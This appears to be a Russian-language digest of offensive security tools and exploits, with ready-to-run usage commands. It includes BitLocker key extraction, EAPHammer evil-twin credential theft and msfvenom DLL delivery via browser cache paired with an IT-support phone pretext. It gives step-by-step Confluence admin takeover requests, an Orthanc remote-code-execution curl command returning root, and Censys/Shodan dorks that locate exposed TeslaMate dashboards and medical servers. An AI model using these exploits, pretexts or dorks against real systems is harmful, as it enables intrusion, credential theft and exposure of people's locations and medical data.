https://blog.projectdiscovery.io/nuclei-v3-featurefusion

Вышел Nuclei v3!

В новом обновлении известного сканера уязвимостей добавили:
— Code Protocol - возможность использовать в темплейтах скрипты на Python, bash и Javascript. Теперь, помимо базовых конструкций для нахождения и эксплуатации уязвимостей, можно писать сложную логику для пост-эксплуатации, а еще вызывать другие инструменты (например, sqlmap).
— Template Signing & Verification - возможность подписывать собственные шаблоны с помощью ECDSA, и проверять чужие. Базовые nuclei-templates уже подписаны командой ProjectDiscovery.
— Multi-Protocol Engine - теперь можно писать проверки, состоящие из нескольких шагов, и для разных протоколов. Например, сначала найти новые поддомены, а потом попробовать проэксплуатировать Subdomain Takeover.

Примеры шаблонов с использованием новых возможностей:
— Fingerprint SSH Server (SSH Protocol)
— CVE-2020-0796 (aka SMBGhost)
— MS SQL Server Credential Stuffing
— Redis Password Bruteforce
— SSH Credential Stuffing

В ближайшем будущем команда планирует написать DSL v2 и расширить поддержку фаззинга (заголовок, тело и многое другое).

https://docs.google.com/spreadsheets/d/1b4mUxa6cDQuTV2BPC6aA-GR4zGZi0ooPYtBe4IgPsSc

Выбирайте лучшее

https://github.com/p0dalirius/ExtractBitlockerKeys

Скрипт для автоматического извлечения ключей восстановления BitLocker из домена.

Возможности:
— Получение списка всех компьютеров с помощью LDAP.
— Итерация по полученным данным с использованием многопоточности.
— Экспорт результатов в JSON/XLSX/SQLITE3 с полными именами компьютеров, доменом, идентификаторами томов и ключами восстановления

Пример использования

./ExtractBitlockerKeys.py -d 'domain.local' -u 'Administrator' -p 'Podalirius123!' --dc-ip 192.168.1.101

Использовать при постэксплуатации для восстановления зашифрованных данных.

https://github.com/guibacellar/TEx

TEx — это инструмент, созданный для помощи исследователям, следователям и представителям правоохранительных органов в сборе и обработке огромного количества данных, генерируемых криминальными, мошенническими, и другими группами пользователей Telegram.

Возможности:
— Менеджер соединений для нескольких аккаунтов
— Парсер информации о группах и их пользователях
— Message Listener с дампом новые сообщения
— Генератор HTML-отчетов с экспортом файлов

Rekognition Discord Bot

Discord-бот для анализа изображений. Умеет идентифицировать предметы, распознавать эмоции, знаменитостей и извлекать текст.

Использует API AWS Rekognition. Разработчик поднял собственный инстанс на сервере The Pirates' Plunder, который можно использовать бесплатно.

Кроме того, там есть и другие боты:
— Hashcat Bot - использует hashcat со словарями RockYou и Crackstation, чтобы взламывать пароли
— Shodan Bot - хакерский поисковик для поиска информации о сервисах, устройствах и уязвимостях
— DarkWeb Bot - ищет запросы в даркнете и возвращает ссылки со скриншотами результатов с помощью ahmia.fi.
— Email OSINT Bot - проверка электронной почты на наличие связанных аккаунтов в социальных сетях и слитых паролей
— Watson Bot - поиск по никнейму в различных сервисах для проверки на существование аккаунта

https://github.com/s0lst1c3/eaphammer

EAPHammer — это набор инструментов для проведения целевых атак "злой двойник" на сети WPA2-Enterprise. Предназначен для использования Red Team при проведении пентестов беспроводных сетей.

Возможности:
— Кража учетных данных RADIUS из сетей WPA-EAP и WPA2-EAP.
— Выполнение атак c использованием Hostile Portal для кражи учетных данных AD
— Выполнение атак с использованием Captive Portal
— Встроенная интеграция с Responder
— Поддержка открытых сетей и WPA-EAP/WPA2-EAP
— Поддержка SSID cloaking
— Быстрые и автоматизированные PMKID-атаки на PSK-сети с использованием hcxtools

Установка:

git clone https://github.com/s0lst1c3/eaphammer.git
cd ./eaphammer
./kali-setup

Пример использования:

eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds

https://sensepost.com/blog/2023/browsers-cache-smuggling/

Я использую социальную инженерию, чтобы заставить сотрудников запустить мой код и получить доступ к их системе.

Я звоню им и говорю, что я из ИТ-поддержки, прошу перейти на "официальный" сайт с PowerShell-скриптом, который им нужно запустить, чтобы решить какую-то выдуманную проблему.

Но EDR блокируют подозрительные скрипты, поэтому я хотел найти более скрытный способ доставки полезной нагрузки целевым пользователям.

Простая техника, чтобы доставить вредонос на машину цели, не заставляя ее ничего скачивать. Суть в том, чтобы отдать DLL с пейлоадом из msfvenom как изображение, и заставить браузер его закэшировать. А дальше развить атаку, используя комбинацию из DLL Hijacking в связке с социальной инженерией.

Конфиг Nginx:

location /calc.dll {
  types { } default_type image/jpeg;
  add_header Tag DLLHERE;
}

Найти файл с тегом в кэше:

Select-String "DLLHERE" *

https://github.com/vchan-in/CVE-2023-35078-Exploit-POC

Remote Unauth API Access in MobileIron Core (CVE-2023-35078)

Mobile Device Management системы привлекательны для злоумышленников, так как их компрометация обеспечивает доступ к тысячам мобильных устройств.

CISA и NCSC-NO предупреждают о возможности широкого использования уязвимостей Ivanti в сетях государственного и частного секторов.

Пример использования:
python cve_2023_35078_poc.py -u http://
python cve_2023_35078_poc.py -f urls.txt

https://github.com/godaddy/tartufo

tartufo — это утилита, которая сканирует репозитории в поисках случайно оставленных токенов и учетных данных.

Она проверяет всю историю коммитов каждой существующей ветки и ищет секреты, используя регулярки и проверяя энтропию.

Установка:
pip install tartufo

Сканировать удаленный репозиторий:
tartufo scan-remote-repo git@github.com:my_user/my_repo.git

Локальный:
tartufo scan-local-repo /path/to/your/git/repo

https://github.com/blasty/unwyze

Wyze Cam v3 RCE Exploit

Я исследовал прошивку Wyze Cam V3 в рамках участия в Pwn2Own Toronto и нашел несколько критических уязвимостей. После того, как я написал эксплоит и собирался вылетать на конференцию, я узнал, что компания Wyze выпустила обновление прошивки.

Эксплоит комбинирует две уязвимости:
1. Обход аутентификации DTLS в демоне iCamera
2. Переполнение буфера стека при парсинге json
и позволяет получить шелл, зная IP камеры.

Уязвимые версии: 4.36.10.4054, 4.36.11.4679 и 4.36.11.5859

https://github.com/cosad3s/postleaks

postleaks — это сканер воркспейсов Postman, который умеет находить конфиденциальное в общедоступном.

Postman позволяет делиться шаблонами запросов к API и объединять их в воркспейсы. Разработчики часто забывают в них недокументированные эндпоинты и учетные данные.

Установка:

pip3 install postleaks

Использование:

postleaks -k <ключевое слово> (домен/компания)

https://github.com/pentagridsec/archive_pwn

archive pwn — это утилита на Python для создания zip-, tar- и cpio-архивов, которые эксплуатирует Zip Slip уязвимости.

Благодаря таким архивам, файлы можно распаковать в произвольное место на системе. В комбинации с другими уязвимостями, приводит к полной компрометации системы.

https://blog.blacklanternsecurity.com/p/subdomain-enumeration-tool-face-off-4e5

Сравнение утилит для поиска поддоменов. Запуск "из коробки" на сайте популярной авиакомпании с широким скоупом Delta Airlines и авиакомпании поменьше — Spirit Airlines.

Нашел больше всего поддоменов — BBOT.
Самые быстрые — Subfinder и Findomain.
Поощрительный приз — theHarvester.

Примечательно, что статью написала компания, чей сканер занял первое место. Количество результатов объясняют использованием API subdomain.center от неизвестной Pwning Syndicate, которое генерирует поддомены с помощью ML.

Пока не вчитывался в новую CVE-2023-22518 10/10, но знаю о CVE-2023-22515 и думаю, что они похожи.

То, почему она стала возможна, заключается в особенностях маршрутизации внутри фреймворка, который использует Confluence.

А работает он на базе Apache Struts, который, в свою очередь, использует XWork.

Это важно, потому что особенность XWork позволяет определять действия "Action" в виде Java-классов. Открываем страницу http://<confluence>/login.action, у приложения вызывается метод "execute" класса "Login".

А еще XWork умеет взаимодействовать с геттерами и сеттерами с помощью CGI-параметров. Добавим к прошлому URL ?Id=123 и вызовем setId("123") из уже знакомого Login.

У Login есть метод, который возвращает объект BootstrapStatusProvider, мы тоже можем его вызвать. А тот, в свою очередь, расширяет ActionSupport и наследует уже все его методы.

Ну, вы поняли. Раскрутив всю цепочку из геттеров, можно дойти до самого главного класса ApplicationConfig. Он управляет конфигурацией приложения и у него, как можно было доказаться, есть сеттер setupComplete.

Если мы его переопределим, то сможем заново инициализировать приложение. Для этого достаточно отправить запрос https://<confluence>/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false

А дальше открыть
https://<confluence>/setup/setupadministrator-start.action
поменять пароль админа и зайти.

Сам Confluence организует работу в куче компаний, поэтому его компрометация грозит получением доступа над всем воркспейсом сотрудников.

А эксплоит под новую CVE вы можете взять тут https://github.com/sanjai-AK47/CVE-2023-22518

https://infosecwriteups.com/how-i-hacked-1000-tesla-cars-using-osint-4cd837b8c530

Censys: "TESLAMATE" and "Dashboards" and not "sign_in"

Владельцы Tesla открывают свои админки TeslaMate без аутентификации. Там данные о машине, статистика, аналитика и все маршруты, включая дорогу до дома.

https://github.com/ShielderSec/poc/tree/main/CVE-2023-33466

Orthanc — это ПО с открытым исходным кодом для управления, обмена и визуализации данных медицинских исследований пациентов.

В версиях < 1.12.0 Orthanc подвержен уязвимости, связанной с перезаписью произвольных файлов (CVE-2023-33466), которая позволяет получить RCE в системе.

Shodan: "Orthanc Secure Area"

Пример использования:
python3 exploit.py --url "http://localhost" --config-path "/tmp/orthanc.json" --creds "orthanc:orthanc"
curl -H "Authorization: Basic $(echo -n "orthanc:orthanc" | base64)" -X POST http://localhost/tools/execute-script -d "local handle = io.popen('id'); print(handle:read('*a'))"

uid=0(root) gid=0(root) groups=0(root)